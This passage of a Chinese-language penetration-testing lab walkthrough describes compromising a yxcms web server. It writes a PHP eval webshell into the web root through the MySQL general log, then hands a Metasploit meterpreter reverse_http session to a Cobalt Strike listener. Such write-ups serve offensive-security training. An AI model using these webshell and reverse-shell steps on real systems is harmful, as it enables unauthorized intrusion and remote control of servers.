执行以下命令
set global general_log=on; #开启日志 set global general_log_file='C:/phpstudy/www/yxcms/hack.php'; #设置指定文件为网站日志存放文件 SELECT '<?php eval($_POST["cmd"]);?>' #执行该语句,会将该命令写入日志文件中最后用菜刀连接,如下。
后渗透第一步
在拿到了Web服务器的权限后,我们就要尽可能多的搜集该服务器的信息,然后搭建隧道通往内网!
执行以下命令我们知道当前的用户身份是 administrator ,在管理员组中,并且处在域 god 中。该主机有两张网卡,分别是:192.168.10.14,192.168.52.143。由此可知,其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录,为啥不以本地普通用户登录??)
现在我们想反弹一个MSF的shell。将MSF生成的木马上传到该主机上,执行,反弹成功!
派生CobaltStrike权限
首先在CobaltStrike上开启一个监听
然后在MSF中执行以下操作,我们的CobaltStrike就接收到反弹过来的shell了。
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true set lhost xxxx #cobaltstrike监听的ip set lport 14444 #cobaltstrike监听的端口 set session 1 #这里是获得的session的id exploit
获得System权限
这里由于获得的直接是adminsitrator权限,所以可以直接提到system。在真实环境中,这里很多时候都是一个普通用户权限,需要我们去提权。